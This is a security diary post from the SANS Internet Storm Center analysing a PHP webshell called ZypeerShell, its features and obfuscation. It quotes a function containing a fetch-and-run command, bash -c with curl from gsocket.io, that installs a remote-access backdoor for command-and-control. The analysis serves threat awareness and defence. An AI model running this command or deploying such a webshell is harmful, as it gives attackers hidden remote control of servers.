Webshells Remain Popular, (Mon, Jun 22nd)

Webshells Remain Popular

Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time to track them[3] and slightly paid less attention to them, but today I found another one. It seems to be a new player (pushed on GitHub two months ago).

The webshell is called ZypeerShell[4] and pretends to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub." The shell is classic and provides most of the expected features for such a tool:

• File management
• Command execution
• Database interaction
• Reverse shell capabilities

I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. For example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket:

function zypeergsdeploy() {
    zypeerhead();
    echo ' | GSocket Deploy Tool | ';
    echo ' ';
    echo 'This tool runs the official GSocket installation command: ';
    echo ' bash -c "$(curl -fsSL https://gsocket.io/y)" ';
    echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i). ';
    echo 'Click "Run" below to execute it directly.';
    echo ' ';
    if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {
        [...]
    }
}

This function is never called! Note that the GitHub repository contains a version obfuscated with Fortress Layer, a multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel.

[1] https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106
[2] https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567
[3] https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf
[4] https://github.com/sagsooz/ZypeerShell

Xavier Mertens (@xme)
Xameco Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key